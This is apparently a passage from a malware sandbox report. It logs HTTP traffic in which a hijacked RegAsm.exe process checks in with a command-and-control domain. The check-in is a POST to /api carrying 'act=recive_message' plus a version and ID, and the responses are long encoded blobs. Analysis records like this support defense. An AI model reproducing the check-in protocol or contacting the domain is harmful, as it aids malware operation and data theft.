                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TMh%2FhH60NIHzV%2B%2BMDbdQJAJTa6%2BhPB8JA5DRgacWip5ZhucwkwmRQri7PEtXXpdrGjukby%2FfwkWGYBNMBUjbggt88cC6q%2FV1cKpVG6ocyPG8yeX0wujxfuH1Njth%2BK3pwrEBIpA3YJicfg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 88887156ba584276-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:06 UTC549INData Raw: 33 64 62 34 0d 0a 4d 53 33 6e 76 6c 59 6b 55 55 4d 6c 6f 44 58 48 72 65 33 38 6f 38 54 45 57 50 63 50 31 6e 63 70 44 31 74 76 79 43 53 50 37 6b 6c 4b 4a 2b 36 63 49 41 5a 72 59 78 47 4d 50 38 36 50 6e 70 6d 42 2f 75 51 73 68 58 71 7a 57 79 4d 47 65 51 36 73 42 72 58 4f 4c 31 42 42 6c 4e 74 36 4c 6c 68 68 53 4e 67 58 2f 59 32 32 39 71 71 2f 7a 6c 48 2b 4c 62 4d 5a 43 7a 56 37 54 62 39 42 37 59 73 78 52 55 69 4a 7a 54 39 4c 50 77 4e 49 78 55 47 6d 77 49 79 50 79 4f 71 74 4e 39 55 6a 33 48 34 67 4c 54 34 56 36 68 36 76 7a 41 52 55 57 59 62 7a 4e 31 63 36 59 51 6d 71 50 4d 36 50 69 49 69 42 2f 75 52 36 71 79 32 6d 46 6c 74 75 4e 68 79 55 42 72 57 56 46 52 4e 45 6b 39 73 6b 52 53 55 71 53 73 35 47 6d 34 2f 58 79 70 50 30 39 47 6a 48 63 76 52 39 49 48 4a 52 5a
                                Data Ascii: 3db4MS3nvlYkUUMloDXHre38o8TEWPcP1ncpD1tvyCSP7klKJ+6cIAZrYxGMP86PnpmB/uQshXqzWyMGeQ6sBrXOL1BBlNt6LlhhSNgX/Y229qq/zlH+LbMZCzV7Tb9B7YsxRUiJzT9LPwNIxUGmwIyPyOqtN9Uj3H4gLT4V6h6vzARUWYbzN1c6YQmqPM6PiIiB/uR6qy2mFltuNhyUBrWVFRNEk9skRSUqSs5Gm4/XypP09GjHcvR9IHJRZ
                                2024-05-23 22:22:06 UTC1369INData Raw: 46 42 56 49 55 77 69 32 47 7a 43 78 66 44 39 32 65 64 45 41 39 49 45 72 43 52 61 33 45 68 4a 76 54 72 61 38 33 6d 47 32 35 48 30 52 75 4f 51 71 67 54 4f 4b 47 4c 31 35 43 67 39 77 30 42 6e 31 4a 4c 4b 6b 58 6f 74 66 50 78 6f 50 6d 68 54 2b 46 61 72 67 44 43 56 64 35 5a 63 46 5a 6f 2b 64 70 45 53 66 75 78 56 77 74 57 47 46 41 7a 68 66 39 6a 63 2b 57 78 4b 57 6c 4d 5a 70 75 76 42 35 5a 62 53 73 4c 70 30 50 2f 69 69 35 64 52 59 62 4f 50 6b 67 31 49 6b 37 4a 58 71 44 49 69 39 36 50 7a 73 31 52 31 57 71 73 56 52 4d 76 65 53 79 6e 54 65 47 47 50 46 4d 50 37 62 63 72 43 46 74 4b 58 71 6f 38 7a 6f 2b 49 6b 6f 48 2b 35 48 71 52 62 4c 41 55 54 32 4d 33 43 61 5a 41 34 34 45 6b 56 55 57 46 32 7a 35 4f 4f 79 42 4b 79 56 69 6c 79 6f 4b 61 78 36 71 6e 50 39 55 6a 33 48
                                Data Ascii: FBVIUwi2GzCxfD92edEA9IErCRa3EhJvTra83mG25H0RuOQqgTOKGL15Cg9w0Bn1JLKkXotfPxoPmhT+FargDCVd5ZcFZo+dpESfuxVwtWGFAzhf9jc+WxKWlMZpuvB5ZbSsLp0P/ii5dRYbOPkg1Ik7JXqDIi96Pzs1R1WqsVRMveSynTeGGPFMP7bcrCFtKXqo8zo+IkoH+5HqRbLAUT2M3CaZA44EkVUWF2z5OOyBKyVilyoKax6qnP9Uj3H
                                2024-05-23 22:22:06 UTC1369INData Raw: 54 61 6c 4b 34 49 55 75 58 46 32 50 30 44 56 55 4e 43 68 4f 79 46 61 72 77 49 53 53 78 4c 53 74 4e 5a 31 69 74 52 68 47 5a 6a 30 4e 36 67 69 46 35 30 41 54 53 4a 32 63 62 41 52 7a 41 45 72 4e 52 61 62 65 7a 61 76 43 71 4b 67 39 67 79 33 63 66 6c 51 6a 55 57 61 7a 4c 6f 62 6e 61 31 52 44 78 59 52 32 42 6a 49 74 53 38 4e 59 6f 38 57 48 6e 63 43 30 72 7a 57 64 59 72 30 55 53 47 6b 34 42 37 68 55 37 59 41 35 58 30 57 44 30 7a 6c 4b 63 32 38 76 71 54 7a 6c 79 4a 66 65 6d 65 54 6d 45 4a 5a 35 74 78 38 4a 57 44 6f 44 70 45 48 37 7a 45 4d 34 55 4d 75 30 58 31 39 62 53 69 79 43 55 4b 6d 50 31 39 79 42 71 36 63 79 6b 33 2b 37 47 45 68 6a 4e 77 4b 76 53 65 57 4d 4b 31 35 4b 67 64 63 2f 52 54 34 6c 56 63 68 58 72 63 71 4f 6c 4d 76 6d 36 46 4c 2b 42 76 51 53 55 79 31
                                Data Ascii: TalK4IUuXF2P0DVUNChOyFarwISSxLStNZ1itRhGZj0N6giF50ATSJ2cbARzAErNRabezavCqKg9gy3cflQjUWazLobna1RDxYR2BjItS8NYo8WHncC0rzWdYr0USGk4B7hU7YA5X0WD0zlKc28vqTzlyJfemeTmEJZ5tx8JWDoDpEH7zEM4UMu0X19bSiyCUKmP19yBq6cyk3+7GEhjNwKvSeWMK15Kgdc/RT4lVchXrcqOlMvm6FL+BvQSUy1
                                2024-05-23 22:22:06 UTC1369INData Raw: 75 69 65 49 31 56 49 69 64 51 78 53 54 55 6b 53 73 56 63 70 74 32 64 6e 63 57 6f 71 6e 72 62 42 64 39 2b 43 32 6f 68 54 66 49 45 72 61 6b 38 55 46 2b 44 33 33 51 75 57 44 34 4a 71 6a 79 38 70 2b 54 31 67 61 47 71 65 73 30 76 39 42 56 46 59 54 49 4b 6f 55 33 70 69 43 74 65 52 49 76 53 50 55 6f 37 4c 55 44 51 57 71 44 48 68 5a 66 45 71 71 73 35 68 32 36 31 56 51 55 46 55 6d 62 71 51 66 58 4d 63 78 45 50 6f 75 38 44 5a 58 4e 4a 4c 4e 30 5a 7a 61 53 57 39 71 72 4e 35 6a 32 5a 4c 65 78 58 43 32 77 78 43 71 52 43 2f 34 49 35 58 55 69 46 32 6a 78 4f 4e 43 31 4a 7a 45 57 74 7a 6f 2b 51 7a 71 36 76 50 70 52 70 73 42 6c 4d 4c 58 64 6c 77 53 32 74 69 7a 4d 54 46 38 65 63 48 45 55 70 4f 77 58 73 58 4b 58 49 6e 34 6a 61 35 73 35 52 69 69 50 63 66 6c 49 46 55 6d 62 71
                                Data Ascii: uieI1VIidQxSTUkSsVcpt2dncWoqnrbBd9+C2ohTfIErak8UF+D33QuWD4Jqjy8p+T1gaGqes0v9BVFYTIKoU3piCteRIvSPUo7LUDQWqDHhZfEqqs5h261VQUFUmbqQfXMcxEPou8DZXNJLN0ZzaSW9qrN5j2ZLexXC2wxCqRC/4I5XUiF2jxONC1JzEWtzo+Qzq6vPpRpsBlMLXdlwS2tizMTF8ecHEUpOwXsXKXIn4ja5s5RiiPcflIFUmbq
                                2024-05-23 22:22:06 UTC1369INData Raw: 74 58 52 49 72 51 4f 6b 6f 34 4b 6b 7a 42 58 61 7a 4d 67 35 6a 41 71 4b 59 30 6c 53 33 36 66 53 41 47 65 51 71 79 42 72 58 4f 61 33 4e 45 6b 38 6b 33 56 6a 55 6d 53 34 49 2f 7a 74 44 42 39 71 71 2f 7a 6c 48 2b 4c 62 4d 5a 43 7a 56 37 54 61 52 55 36 59 30 72 57 30 61 4a 31 7a 78 55 4e 43 5a 4d 7a 46 6d 75 79 34 4f 58 79 71 2b 6a 4e 70 52 6d 76 52 42 50 5a 7a 38 41 36 67 69 46 35 30 41 54 53 4a 32 63 62 41 52 7a 44 55 54 4e 58 4f 57 6e 35 49 47 50 7a 73 30 6a 2f 51 62 66 56 55 78 68 65 56 58 6f 42 75 71 45 49 31 31 4d 67 39 63 34 53 6a 49 6f 51 63 64 66 6f 73 43 49 6c 38 61 6d 6f 43 69 53 59 4c 30 56 51 47 51 7a 43 61 74 4e 72 63 4a 44 4f 43 54 46 32 79 77 47 61 32 4d 48 38 46 43 7a 33 34 7a 65 71 63 32 35 64 50 34 46 33 77 77 6a 42 6c 4a 4e 72 55 71 74 31
                                Data Ascii: tXRIrQOko4KkzBXazMg5jAqKY0lS36fSAGeQqyBrXOa3NEk8k3VjUmS4I/ztDB9qq/zlH+LbMZCzV7TaRU6Y0rW0aJ1zxUNCZMzFmuy4OXyq+jNpRmvRBPZz8A6giF50ATSJ2cbARzDUTNXOWn5IGPzs0j/QbfVUxheVXoBuqEI11Mg9c4SjIoQcdfosCIl8amoCiSYL0VQGQzCatNrcJDOCTF2ywGa2MH8FCz34zeqc25dP4F3wwjBlJNrUqt1
                                2024-05-23 22:22:06 UTC1369INData Raw: 75 6e 44 4e 4b 63 33 6b 46 67 6c 61 70 77 49 79 52 77 71 57 6e 4d 49 64 2f 75 42 78 44 61 44 55 47 70 45 44 2f 69 69 52 61 54 49 62 56 4d 30 34 2f 4b 30 54 46 46 2b 75 6e 35 50 57 42 6f 62 35 36 7a 53 2f 30 4e 6c 78 39 4e 45 33 43 4c 66 4c 43 51 7a 68 57 37 62 64 66 42 6a 51 74 42 35 6f 56 35 63 65 43 6c 73 75 69 6f 54 65 53 61 37 30 48 51 6d 67 33 44 61 35 4e 34 6f 6f 76 55 45 2b 58 32 6a 42 4f 4d 43 78 4b 7a 46 53 68 6a 38 48 32 71 73 33 6d 50 59 30 74 37 46 63 4c 58 7a 51 44 73 55 6e 71 6e 53 45 54 4a 2b 37 44 65 69 35 59 4f 43 2b 70 50 4f 58 49 67 39 36 5a 35 4f 59 2b 6d 33 2b 2f 46 45 42 6d 4e 77 71 6c 51 2b 65 4d 4a 46 64 4d 69 39 63 31 52 54 73 73 53 73 78 64 72 4d 61 49 6b 73 57 68 35 6e 54 39 42 74 39 56 54 48 56 35 56 65 67 47 78 71 30 47 66 30
                                Data Ascii: unDNKc3kFglapwIyRwqWnMId/uBxDaDUGpED/iiRaTIbVM04/K0TFF+un5PWBob56zS/0Nlx9NE3CLfLCQzhW7bdfBjQtB5oV5ceClsuioTeSa70HQmg3Da5N4oovUE+X2jBOMCxKzFShj8H2qs3mPY0t7FcLXzQDsUnqnSETJ+7Dei5YOC+pPOXIg96Z5OY+m3+/FEBmNwqlQ+eMJFdMi9c1RTssSsxdrMaIksWh5nT9Bt9VTHV5VegGxq0Gf0
                                2024-05-23 22:22:06 UTC1369INData Raw: 5a 53 51 33 54 63 56 62 73 38 53 4f 6e 64 65 72 74 6e 72 39 42 71 74 62 49 77 59 67 5a 63 45 74 72 59 73 6e 45 78 66 48 6e 44 4a 50 4e 53 5a 42 7a 45 57 67 79 59 43 52 79 4b 2b 69 4d 70 5a 74 73 42 46 4d 61 44 6f 42 6f 55 48 75 67 79 39 61 51 59 7a 54 64 41 68 62 53 69 79 43 55 4c 32 50 31 39 79 42 68 37 30 35 6d 57 44 30 66 53 42 79 64 32 58 42 58 34 58 6e 51 42 4e 49 69 5a 78 73 42 48 4d 74 53 63 64 58 72 38 6d 4c 6d 38 65 73 6f 7a 71 65 62 72 73 52 54 57 6b 32 44 61 46 50 37 49 6f 75 57 55 53 44 30 54 64 41 4e 57 45 4a 71 6a 7a 4f 6a 34 69 47 67 66 37 6b 65 72 56 32 75 52 6c 4d 4c 56 46 6d 74 51 69 46 35 7a 49 37 4a 4f 36 63 4d 30 70 7a 65 51 57 43 58 4b 6e 4c 69 4a 37 4d 70 61 34 2f 6b 57 65 78 46 55 4e 2f 4d 51 32 74 56 50 2b 4d 49 6c 5a 44 68 74 77
                                Data Ascii: ZSQ3TcVbs8SOndertnr9BqtbIwYgZcEtrYsnExfHnDJPNSZBzEWgyYCRyK+iMpZtsBFMaDoBoUHugy9aQYzTdAhbSiyCUL2P19yBh705mWD0fSByd2XBX4XnQBNIiZxsBHMtScdXr8mLm8esozqebrsRTWk2DaFP7IouWUSD0TdANWEJqjzOj4iGgf7kerV2uRlMLVFmtQiF5zI7JO6cM0pzeQWCXKnLiJ7Mpa4/kWexFUN/MQ2tVP+MIlZDhtw
                                2024-05-23 22:22:06 UTC1369INData Raw: 53 2b 70 50 4a 71 42 35 2f 57 71 35 72 35 36 7a 53 2f 30 49 45 68 6a 4e 77 71 38 56 36 43 72 4a 56 52 4f 6b 38 77 6a 53 58 4e 76 4c 36 6b 38 35 63 6e 50 78 6f 50 31 36 46 4c 2b 42 76 51 52 57 69 31 68 54 2f 6f 55 74 74 6c 34 42 42 2f 58 74 46 39 5a 66 55 6b 73 32 7a 2f 4f 70 4d 2b 49 67 66 37 6b 61 4e 73 46 33 33 34 4c 66 33 6c 56 36 41 61 71 6a 7a 6c 42 53 59 62 4b 4e 77 45 4e 48 32 44 55 58 61 4c 66 69 49 6e 4f 35 75 68 53 2f 67 62 30 47 67 73 31 65 7a 54 43 4c 59 62 6e 61 31 70 49 6e 73 30 69 53 79 4d 6d 42 36 6f 38 7a 76 44 42 39 71 72 4e 35 69 4c 56 4e 66 5a 56 66 6d 34 33 41 36 31 51 2f 4d 45 4d 52 55 57 43 7a 44 4e 52 50 47 45 4a 71 6a 7a 4f 6a 34 6e 65 6d 65 54 31 64 50 30 47 33 31 56 50 66 48 6c 56 36 42 61 2f 31 33 34 41 47 4e 57 4f 58 43 30 73
                                Data Ascii: S+pPJqB5/Wq5r56zS/0IEhjNwq8V6CrJVROk8wjSXNvL6k85cnPxoP16FL+BvQRWi1hT/oUttl4BB/XtF9ZfUks2z/OpM+Igf7kaNsF334Lf3lV6AaqjzlBSYbKNwENH2DUXaLfiInO5uhS/gb0Ggs1ezTCLYbna1pIns0iSyMmB6o8zvDB9qrN5iLVNfZVfm43A61Q/MEMRUWCzDNRPGEJqjzOj4nemeT1dP0G31VPfHlV6Ba/134AGNWOXC0s
                                2024-05-23 22:22:06 UTC1369INData Raw: 66 72 70 2b 54 31 67 61 6e 6d 59 74 64 55 39 42 5a 5a 66 33 59 63 76 45 76 39 69 32 64 62 58 6f 6a 51 64 41 68 78 59 51 76 47 58 4b 6e 4b 69 49 36 4f 74 4c 59 78 6d 58 76 34 45 56 6b 74 64 30 2f 71 56 2b 61 44 4f 56 31 49 79 73 30 69 53 79 4d 69 51 73 55 62 72 64 36 43 6b 6f 48 6f 35 48 71 41 5a 72 67 54 52 6e 68 32 48 4c 78 46 2b 34 74 6e 57 31 36 49 30 48 52 35 66 55 6b 73 71 52 65 39 6a 39 66 63 67 5a 4f 6c 4e 4a 74 71 6f 67 51 47 54 54 49 42 71 55 72 73 69 32 73 64 4a 2b 36 33 64 45 42 7a 65 51 57 52 47 63 32 6b 35 4e 37 46 74 2b 5a 69 31 7a 33 6d 54 68 34 2b 62 6c 33 34 4c 6f 61 54 5a 54 73 6b 6e 4c 52 66 4c 58 4d 33 42 35 6f 56 39 34 48 6e 39 61 72 6d 74 48 72 4e 4c 2f 52 53 53 48 38 72 43 36 6c 51 37 73 73 56 62 55 36 49 30 33 68 49 4f 43 46 41 30
                                Data Ascii: frp+T1ganmYtdU9BZZf3YcvEv9i2dbXojQdAhxYQvGXKnKiI6OtLYxmXv4EVktd0/qV+aDOV1Iys0iSyMiQsUbrd6CkoHo5HqAZrgTRnh2HLxF+4tnW16I0HR5fUksqRe9j9fcgZOlNJtqogQGTTIBqUrsi2sdJ+63dEBzeQWRGc2k5N7Ft+Zi1z3mTh4+bl34LoaTZTsknLRfLXM3B5oV94Hn9armtHrNL/RSSH8rC6lQ7ssVbU6I03hIOCFA0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                7192.168.2.649720188.114.96.34434340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:05 UTC271OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: application/x-www-form-urlencoded
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 49
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:05 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74
                                Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
                                2024-05-23 22:22:06 UTC814INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:06 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=gtssvbb14igcjppdot0vqikd1l; expires=Mon, 16-Sep-2024 16:08:45 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4sR5EpNsC1WcOwwKL%2FKftONEkaBrKu3z18DaErWh8MDPSF3aVgom0hgh2kQoTDWw6x75gjm4EXlSmta4b242DFcunc7jyq3fure3%2BHoSOdoCnBy5bQEHAE1aZuwN1%2F9PSSeOwvdK%2B1gozw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 88887156cfe28cad-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:06 UTC555INData Raw: 31 66 62 31 0d 0a 65 57 4d 6a 73 52 67 62 71 68 30 4c 70 53 45 54 31 65 41 54 64 59 34 7a 52 61 73 44 76 63 69 63 52 34 33 4d 46 41 4b 6a 30 42 45 43 61 53 71 54 62 6a 6d 51 50 54 2b 4a 4b 78 72 33 6b 33 5a 58 74 42 4d 78 32 58 62 59 35 4a 5a 4f 72 36 31 77 49 4a 6e 77 64 78 67 50 55 4e 51 30 45 61 4d 2f 5a 74 30 44 4b 66 57 37 47 58 7a 31 4f 55 79 69 49 64 69 6d 76 6e 32 74 37 6d 4e 6e 77 62 56 70 44 51 5a 4e 77 6e 46 30 78 46 31 6d 77 46 56 79 75 49 46 67 48 71 42 61 4b 6f 6b 76 74 38 47 56 5a 65 69 32 4e 6a 69 44 38 6c 77 63 46 30 4c 38 65 57 6a 42 50 79 65 76 4b 42 72 33 68 57 64 58 74 42 4e 6e 39 79 48 4e 71 65 34 6d 34 4c 39 49 49 4a 6d 72 54 56 73 4b 56 39 52 71 65 74 35 30 5a 4d 74 53 54 2f 66 61 4a 55 57 2b 41 33 57 62 66 70 2f 43 6c 54 71 48 78
                                Data Ascii: 1fb1eWMjsRgbqh0LpSET1eATdY4zRasDvcicR43MFAKj0BECaSqTbjmQPT+JKxr3k3ZXtBMx2XbY5JZOr61wIJnwdxgPUNQ0EaM/Zt0DKfW7GXz1OUyiIdimvn2t7mNnwbVpDQZNwnF0xF1mwFVyuIFgHqBaKokvt8GVZei2NjiD8lwcF0L8eWjBPyevKBr3hWdXtBNn9yHNqe4m4L9IIJmrTVsKV9Rqet50ZMtST/faJUW+A3Wbfp/ClTqHx
                                2024-05-23 22:22:06 UTC1369INData Raw: 67 75 71 38 6e 51 58 51 52 6d 52 4f 6e 2f 47 66 6d 54 48 55 58 6d 38 69 58 51 46 35 31 67 71 78 47 48 53 6f 50 45 6d 37 36 6c 38 61 73 36 34 64 78 59 4d 52 39 4e 36 4f 59 59 58 41 71 77 44 64 71 2f 43 4b 56 57 73 63 69 4c 5a 5a 74 4f 38 76 42 2b 76 78 68 31 2f 6a 39 6b 78 57 57 6b 71 79 68 49 53 6f 7a 39 75 79 77 4d 70 39 63 4a 35 45 75 39 53 4c 4d 5a 69 31 36 48 73 4a 66 32 6f 65 32 58 54 74 48 59 56 43 30 4c 42 63 48 66 4f 66 47 44 4d 53 6e 53 77 68 6a 46 5a 68 44 70 4d 69 57 62 48 36 71 5a 6e 72 34 39 37 61 38 32 34 5a 42 74 42 4b 62 68 6c 4e 36 41 55 63 4b 38 6f 47 76 65 46 66 56 65 30 45 32 66 4e 59 4e 75 72 2b 69 76 68 71 6e 70 6d 7a 37 39 38 48 51 74 42 31 48 42 78 77 48 35 6b 7a 45 78 78 73 6f 39 31 45 65 42 51 49 6f 6b 76 74 38 47 56 5a 65 69 32
                                Data Ascii: guq8nQXQRmROn/GfmTHUXm8iXQF51gqxGHSoPEm76l8as64dxYMR9N6OYYXAqwDdq/CKVWsciLZZtO8vB+vxh1/j9kxWWkqyhISoz9uywMp9cJ5Eu9SLMZi16HsJf2oe2XTtHYVC0LBcHfOfGDMSnSwhjFZhDpMiWbH6qZnr497a824ZBtBKbhlN6AUcK8oGveFfVe0E2fNYNur+ivhqnpmz798HQtB1HBxwH5kzExxso91EeBQIokvt8GVZei2
                                2024-05-23 22:22:06 UTC1369INData Raw: 74 32 46 42 4e 4c 33 33 74 72 7a 33 5a 67 7a 55 4a 2f 75 49 6c 39 45 76 35 61 4b 4d 46 75 33 71 66 7a 4c 75 75 75 4e 69 36 70 32 52 68 62 42 6c 6d 54 49 6a 75 49 58 6d 54 49 55 58 4b 6d 77 45 51 55 34 6c 38 67 33 79 47 33 77 65 46 72 68 38 56 76 43 4b 72 5a 4d 78 77 4e 41 59 73 34 4f 63 6c 7a 5a 63 5a 4d 64 37 32 4b 63 68 62 2b 57 43 6a 42 62 74 61 72 2f 53 48 75 70 47 52 79 77 62 35 68 46 77 74 48 33 48 64 31 69 44 45 42 72 43 67 78 73 4a 6f 78 54 36 34 52 44 63 70 31 33 4b 43 38 45 4f 79 67 65 47 66 58 38 68 74 77 48 67 2b 37 45 57 43 67 46 41 4b 48 52 48 33 33 32 6a 4e 58 34 56 41 76 7a 33 50 51 70 2f 30 72 34 61 46 7a 62 38 6d 79 63 78 59 45 52 64 68 78 65 73 56 37 65 38 31 44 65 62 4b 44 65 78 32 73 48 30 2b 69 43 70 2b 74 35 6d 57 33 37 44 5a 52 31
                                Data Ascii: t2FBNL33trz3ZgzUJ/uIl9Ev5aKMFu3qfzLuuuNi6p2RhbBlmTIjuIXmTIUXKmwEQU4l8g3yG3weFrh8VvCKrZMxwNAYs4OclzZcZMd72Kchb+WCjBbtar/SHupGRywb5hFwtH3Hd1iDEBrCgxsJoxT64RDcp13KC8EOygeGfX8htwHg+7EWCgFAKHRH332jNX4VAvz3PQp/0r4aFzb8mycxYERdhxesV7e81DebKDex2sH0+iCp+t5mW37DZR1
                                2024-05-23 22:22:06 UTC1369INData Raw: 47 54 64 74 2f 64 73 35 36 5a 4d 42 49 63 71 57 51 63 68 50 69 58 57 65 48 43 62 54 42 76 69 4c 33 37 69 34 69 67 5a 64 6b 47 42 46 48 30 44 6f 52 6f 32 41 6e 72 79 68 6f 33 2b 6b 61 56 2b 74 64 5a 35 45 6a 6e 36 72 77 4b 65 53 70 66 57 76 46 74 6e 4d 57 43 6b 2f 64 63 33 58 41 63 32 37 56 54 6e 53 2f 69 48 67 53 34 46 77 6b 32 32 4c 65 36 72 42 4e 68 4d 55 32 5a 39 6e 79 4b 31 6c 42 5a 75 42 4e 57 6f 67 58 41 74 67 4e 47 64 79 62 47 58 79 48 45 53 44 46 49 59 66 6f 76 69 54 6e 71 58 68 6b 30 37 78 68 46 51 5a 42 31 58 4a 78 7a 33 4e 6e 79 56 46 35 74 6f 4a 2f 47 4f 52 59 49 38 68 6c 32 36 62 35 5a 61 48 47 48 51 75 42 74 57 74 62 57 51 4f 54 55 6e 72 53 5a 53 76 70 53 48 47 77 6b 6d 63 4d 72 44 6c 4d 31 69 2b 33 77 65 64 4e 68 4d 55 32 5a 38 33 79 4b 31
                                Data Ascii: GTdt/ds56ZMBIcqWQchPiXWeHCbTBviL37i4igZdkGBFH0DoRo2Anryho3+kaV+tdZ5Ejn6rwKeSpfWvFtnMWCk/dc3XAc27VTnS/iHgS4Fwk22Le6rBNhMU2Z9nyK1lBZuBNWogXAtgNGdybGXyHESDFIYfoviTnqXhk07xhFQZB1XJxz3NnyVF5toJ/GORYI8hl26b5ZaHGHQuBtWtbWQOTUnrSZSvpSHGwkmcMrDlM1i+3wedNhMU2Z83yK1
                                2024-05-23 22:22:06 UTC1369INData Raw: 64 48 58 44 64 47 4c 45 53 58 69 30 6a 6e 63 57 34 6c 45 70 79 53 47 52 77 70 56 4f 72 36 6c 75 49 4a 6e 77 4d 7a 73 4b 56 38 5a 35 61 63 35 34 5a 59 63 72 47 71 6a 4d 47 58 7a 31 4f 55 79 69 49 64 69 6d 76 6e 32 74 37 6e 68 79 78 62 4e 7a 45 77 68 4e 32 48 4a 72 7a 33 68 69 79 55 31 36 73 34 35 34 48 4f 56 55 4b 38 68 71 31 71 2f 36 4c 2b 6d 6a 4e 69 36 70 32 52 68 62 42 6c 6d 54 49 6a 75 49 55 32 72 49 53 44 48 66 36 57 35 5a 68 44 6f 2b 6f 51 71 30 36 76 6b 70 72 2f 59 30 49 4d 61 36 65 78 55 43 52 39 68 32 64 63 6c 32 62 38 4a 4c 64 72 69 46 65 42 44 73 56 7a 58 4f 62 4e 61 71 39 53 7a 6c 71 6e 64 72 67 66 77 62 63 47 6f 42 31 47 49 35 6b 44 30 70 39 55 52 6e 70 34 45 78 66 34 64 4f 61 61 49 4a 74 4c 4f 57 54 6f 54 75 63 57 79 42 36 6a 46 62 44 46 50
                                Data Ascii: dHXDdGLESXi0jncW4lEpySGRwpVOr6luIJnwMzsKV8Z5ac54ZYcrGqjMGXz1OUyiIdimvn2t7nhyxbNzEwhN2HJrz3hiyU16s454HOVUK8hq1q/6L+mjNi6p2RhbBlmTIjuIU2rISDHf6W5ZhDo+oQq06vkpr/Y0IMa6exUCR9h2dcl2b8JLdriFeBDsVzXObNaq9SzlqndrgfwbcGoB1GI5kD0p9URnp4Exf4dOaaIJtLOWToTucWyB6jFbDFP
                                2024-05-23 22:22:06 UTC1369INData Raw: 43 63 72 68 30 4a 39 75 49 46 2b 46 4f 39 51 4c 64 74 7a 30 36 50 32 49 4f 4f 6c 65 47 62 54 74 48 77 53 41 6b 4c 61 66 58 48 45 64 57 72 41 41 7a 2f 66 36 52 70 58 36 30 6c 6e 6b 53 4f 66 69 65 6b 31 34 75 34 65 43 39 37 38 47 33 41 59 4b 62 67 52 4f 63 39 7a 4b 5a 38 42 4d 62 2b 50 65 52 33 6f 56 69 72 4f 5a 39 61 34 39 79 44 68 72 6e 4a 72 7a 72 52 33 47 41 46 54 31 58 35 78 79 33 4a 6b 79 55 42 31 39 38 77 5a 66 49 63 52 49 4e 45 68 68 2b 69 2b 46 2b 4b 67 62 57 2f 47 6f 33 6c 62 61 53 72 4d 4e 42 47 6a 5a 67 47 73 4b 44 47 77 6a 6a 46 50 72 68 45 6a 78 33 50 55 71 2f 55 75 34 61 6c 35 5a 63 75 79 66 42 38 43 54 39 68 37 65 73 42 79 5a 4d 6c 4a 65 4c 36 46 66 52 50 72 45 57 6d 68 43 72 54 71 2b 54 32 76 39 6a 51 67 36 70 4e 65 4e 77 5a 62 6b 78 49 53
                                Data Ascii: Ccrh0J9uIF+FO9QLdtz06P2IOOleGbTtHwSAkLafXHEdWrAAz/f6RpX60lnkSOfiek14u4eC978G3AYKbgROc9zKZ8BMb+PeR3oVirOZ9a49yDhrnJrzrR3GAFT1X5xy3JkyUB198wZfIcRINEhh+i+F+KgbW/Go3lbaSrMNBGjZgGsKDGwjjFPrhEjx3PUq/Uu4al5ZcuyfB8CT9h7esByZMlJeL6FfRPrEWmhCrTq+T2v9jQg6pNeNwZbkxIS
                                2024-05-23 22:22:06 UTC721INData Raw: 42 50 5a 37 79 44 63 67 48 68 51 57 65 68 43 73 44 6b 6c 6b 37 32 78 68 30 4c 67 62 56 2f 57 31 6b 44 6b 33 78 77 7a 6e 68 76 79 56 46 30 73 59 31 2b 48 75 56 56 4c 38 70 68 32 36 37 35 49 4f 79 69 66 57 66 43 76 58 63 53 44 30 6a 63 4f 6a 65 67 46 41 4b 48 52 47 6e 33 32 6a 4e 58 7a 55 6f 6b 78 57 79 66 77 70 55 36 6f 63 59 64 65 61 6e 5a 47 46 73 47 54 5a 4d 69 4f 34 68 7a 5a 38 4a 44 65 37 47 47 64 42 48 6d 56 43 66 43 59 74 43 75 2b 43 48 67 72 6e 31 70 77 4c 52 32 45 51 70 48 33 6e 6c 2f 7a 6a 38 6e 72 79 67 61 39 34 56 70 56 37 51 54 5a 2b 6c 36 30 71 62 35 5a 59 66 46 61 53 36 70 32 57 70 7a 61 69 71 54 66 58 57 49 4a 79 75 48 53 48 32 7a 68 58 45 61 37 31 6b 69 7a 57 76 61 71 76 59 33 35 36 35 78 63 74 4f 79 65 68 34 4e 51 74 4e 2b 66 38 46 35 61
                                Data Ascii: BPZ7yDcgHhQWehCsDklk72xh0LgbV/W1kDk3xwznhvyVF0sY1+HuVVL8ph2675IOyifWfCvXcSD0jcOjegFAKHRGn32jNXzUokxWyfwpU6ocYdeanZGFsGTZMiO4hzZ8JDe7GGdBHmVCfCYtCu+CHgrn1pwLR2EQpH3nl/zj8nryga94VpV7QTZ+l60qb5ZYfFaS6p2WpzaiqTfXWIJyuHSH2zhXEa71kizWvaqvY3565xctOyeh4NQtN+f8F5a
